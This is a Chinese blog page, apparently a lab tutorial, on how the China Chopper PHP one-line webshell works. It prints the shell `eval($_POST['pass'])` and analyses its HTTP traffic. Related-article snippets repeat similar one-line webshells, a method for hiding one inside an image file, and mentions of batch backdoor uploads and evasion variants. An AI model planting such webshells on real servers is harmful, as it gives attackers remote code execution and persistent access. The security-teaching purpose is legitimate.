中国菜刀php一句话,中国菜刀之写一句话木马变形

最新推荐文章于 2023-10-27 00:21:49 发布
最新推荐文章于 2023-10-27 00:21:49 发布
阅读量853 收藏
点赞数
本文详细介绍了中国菜刀php一句话木马的工作原理,包括服务端和客户端的交互,以及如何通过HTTP日志分析其行为。此外,还讨论了一句话脚本的三种变形方法,包括加密、变量拼接和加密拼接,并提供了实验步骤来模拟绕过安全防护的场景。
摘要由CSDN通过智能技术生成

了解一句话脚本的工作原理

一句话脚本的工作原理:

一句话恶意脚本分析服务端与客户端。(此处以asp脚本语言简述原理)

一句话恶意脚本服务端就是我们要用来插入到asp文件中的asp语句,(不仅仅是以asp为后缀的数据库文件),该语句将回为触发,接收入侵者通过客户端提交的数据,执行并完成相应的操作,服务端的代码内容为 其中pass可以自己修改

一句话恶意脚本客户端(即为中国菜刀主程序)用来向服务端提交控制数据的,提交的数据通过服务端构成完整的asp功能语句并执行.

我们尝试抓取http日志来剖析菜刀技术原理:

在上述试验中,我们最开始连接的hack.php的代码如下:1

2

3<?php

eval ($_POST['pass']);

?>

在PHP的代码中:eva() 函数把字符串按照 PHP 代码来计算。该字符串必须是合法的 PHP 代码,且必须以分号结尾。如果没有在代码字符串中调用 return 语句,则返回 NULL。如果代码中存在解析错误,则 eval() 函数返回 false。

在我们通过中国菜刀进行文件管理的时候,系统在做什么呢?

在这里我们需要查看系统的日志进行查找答案(1) 查看系统日志

(2)重新使用菜刀的文件管理功能抓取日志

我们在中国菜刀中重新使用文件管理的功能,其后服务器端产生了日志信息。

服务器端产生了如下日志信息(以下数据为服务器端日志数据,在实验环境中无法查看,仅作理论参考):1172.16.11.2 - -

最低0.47元/天 解锁文章
weixin_39879674
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
菜刀连接PHP WebShell返回200错误
bloodzer0
06-17 6254
错误详情 WebShell内容: <?php @eval($_POST['cmd']); ?> 错误详情: 在Hackber或BurpSuite中却没有问题: 原因分析 PHP7版本过高,在PHP7中,动态调用一些函数是被禁止的,比如在array_map中调用assert会提示:Warning: Cannot call func_num_args() dynamically in %s on line %d 如果把一句话Shell中的@符号去掉,会提示:Cannot call as
php一句话木马菜刀,如何基于菜刀PHP一句话实现单个文件批量上传?
weixin_35741494的博客
03-09 1885
本文原创作者:安全小飞侠0x00 前言很多时候当我们通过某个通用型RCE漏洞批量抓取了很多的webshell后,可能想要批量传个后门以备后用。这时,我们不禁会面临一个问题,使用菜刀一个个上传显得太慢,那么如何快速的实现文件的批量上传呢?本文尝试以菜刀php一句话为例来分析一下如何实现这类需求。0x01 原理分析首先,我们必须了解菜刀是如何通过一句话木马来实现web服务器的文件管理的。下面是最常见...
菜刀连接图片一句话木马
qq_18831583的博客
04-22 2万+
1、先制作图片一句话木马: 找好一张图片如”fox.jpg“,并且准备好一句话脚本php文件fox.php,在图片所在文件夹打开cmd命令行,执行命令:copy fox.jpg/b+fox.php/a fox1.jpg,生成图片一句话文件fox1.jpg 接下来用notepad++打开fox1.php图片,看看一句话也没有写入到图片当中,如图,一句话已经写入刀图片当中: ...
上传漏洞(一句话木马中国菜刀使用、DVWA文件上传漏洞利用)
tmzy1的博客
03-24 3591
上传漏洞(一句话木马中国菜刀使用、DVWA文件上传漏洞利用)
网站安全问题针对一句话木马函数的普析与防范
网站安全专家
06-08 1854
本文内容转载于Sinesafe网站安全服务http://www.sinesafe.com/article/20180608/244.htmlPHP网站安全防一句话木马入侵一、首先是菜刀一句话木马:     菜刀一句话木马的原理是调用了PHP的代码执行函数,比如以下1和2两个常见的一句话菜刀马,就是调用了eval函数、assert函数。1、eval()函数 #传入的参数必须为PHP代码,既需要以分号...
php实现批量查询清除一句话后门的代码
10-30
一句话后门一般简单,容易隐藏危害大,查找麻烦等。今天发现了这个Xall.php专门批量查询干掉一句话后门的代码,大家可以省去不少麻烦了
Cknife 一句话连接工具.7z
07-17
【标签】"cknife 菜刀 jsp一句话"是关键词,"cknife"和"菜刀"都是对Cknife工具的别称,"jsp一句话"则特指上述的1.jsp木马,它是基于Java的Webshell,能够在被入侵的Web服务器上执行命令。 【压缩包子文件的文件名称...
webshell一句话
08-26
php,jsp,asp等脚本的常用一句话拿webshell,然后用菜刀连接即可
PHP网站中的一句话木马安全性和防范措施的研究.pdf
最新发布
01-05
最后,使用中国菜刀对当前一句话木马进行连接。 三、PHP一句话木马写入数据库或者网页文件的方式 一句话木马可以通过SQL注入漏洞或文件上传漏洞写入数据库或者网页文件。 SQL注入漏洞可以使用专用的工具,诸如啊D...
行业文档-设计装置-一种节能菜刀.zip
08-29
在本压缩包“行业文档-设计装置-一种节能菜刀.zip”中,主要包含了一份名为“一种节能菜刀.pdf”的文件。这份文档很可能是关于厨房用具设计领域的一个创新项目,特别是聚焦在节能型菜刀的设计上。接下来,我们将深入...
一句话php木马制作教程_菜刀无法正常访问一句话问题
weixin_35092037的博客
12-21 1778
今天自己搭建了一个php版的xss cookie接收平台。为了图操作上的方便,给自己的web放了一句话木马。但是当我打开菜刀连接时,报了500错误,如图想到可能是php版本问题导致这个问题的。查看了一下服务器上的php版本,7.0.33抓包查看菜刀数据: 去掉z0数据访问正常 那么问题点在z0数据了,解密z0数据: 看到解密后的z0数据,一下想到了...
一句话木马原理介绍和中国菜刀原理的介绍
Firebasky的博客
06-07 6441
菜刀,c刀,蚁剑都使用过。而且他们的方法基本上差不多。 今天突然心血来潮写来研究一下一句话木马菜刀的原理。 下面的原理是自己看其他大佬写的和自己总结的一些介绍。 希望能够帮助老表们~~~ 一句话木马原理 我这里就分析一下PHP代码,其他代码基本上差不多。希望老表们可以自己进行分析。 我们来看一下经典的一句话木马 <?php @eval($_POST['123']); ?> 前面的@表示如果脚本出现错误,则不显示错误。下面就是没有@的时候。会报错! 这里是加了@,则不会进行报错 ev
Web安全-一句话木马
热门推荐
道阻且长,行则将至。
05-08 31万+
在很多的渗透过程中,渗透人员会上传一句话木马到目标web服务目录继而提权获取系统权限,不论asp、php、jsp、aspx都是如此,那么一句话木马到底是什么呢?
中国菜刀的使用
xy_wjyjw的博客
10-27 138
中国菜刀实现与一句话木马联动:中国菜刀在本地(攻击机)。一句话木马在服务器(靶机)上。WebShell Manager管理工具。
PHP一句话木马
bolinmengling的博客
02-27 2万+
一句话木马的普通形式 <?php eval(@$_POST['password']);?> <?php ;?>是php的格式 eval是执行函数 POST是传入的参数,此处使用的是POST方式,同样存在GET、COOKIE方式,一句话木马通过_POST是传入的参数,此处使用的是POST方式,同样存在GET、COOKIE方式,一句话木马通过P​OST是传入的参数,此处使用的...
追踪tcp得到php一句话菜刀连接即可,强大的PHP一句话后门
weixin_32411919的博客
04-14 327
强悍的PHP一句话后门这类后门让网站、服务器管理员很是头疼,经常要换着方法进行各种检测,而很多新出现的编写技术,用普通的检测方法是没法发现并处理的。今天我们细数一些有意思的PHP一句话木马。1.利用404页面隐藏PHP小马:404 Not FoundNot FoundThe requested URL was not found on this server.@preg_replace("/[pa...
一句话木马菜刀的使用
weixin_33720078的博客
08-19 920
来一波原理: eval() 函数把字符串按照 PHP 代码来计算。该字符串必须是合法的 PHP 代码,且必须以分号结尾。如果没有在代码字符串中调用 return 语句,则返回 NULL。如果代码中存在解析错误,则 eval() 函数返回 false <?php @eval($_POST(‘1’);?> 各种绕过文件上传的姿势:https://b...
实验6 一句话木马
Sum
06-02 1094
实验6 一句话木马 一、文件上传漏洞 预备知识 文件上传漏洞是指网络攻击者上传了一个可执行的文件到服务器并执行。这里上传的文件可以是木马,病毒,恶意脚本或者WebShell等。这种攻击方式是最为直接和有效的,部分文件上传漏洞的利用技术门槛非常的低,对于攻击者来说很容易实施。 大部分的网站和应用系统都有上传功能,如用户头像上传,图片上传,文档上传等。一些文件上传功能实现代码没有严格限制用户上传的文件后缀以及文件类型,导致允许攻击者向某个可通过Web访问的目录上传任意PHP/JSP/ASPX/ASP文件,并能够
buuctf菜刀666
09-26
buf菜刀666是一个用于网络安全竞赛中的题目。根据引用中的描述,buuctf菜刀666是一个HTTP流量的题目。你可以在应用显示过滤器中输入http,查看统计里的http请求,进一步分析并解决这个题目。根据引用,你可能需要...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值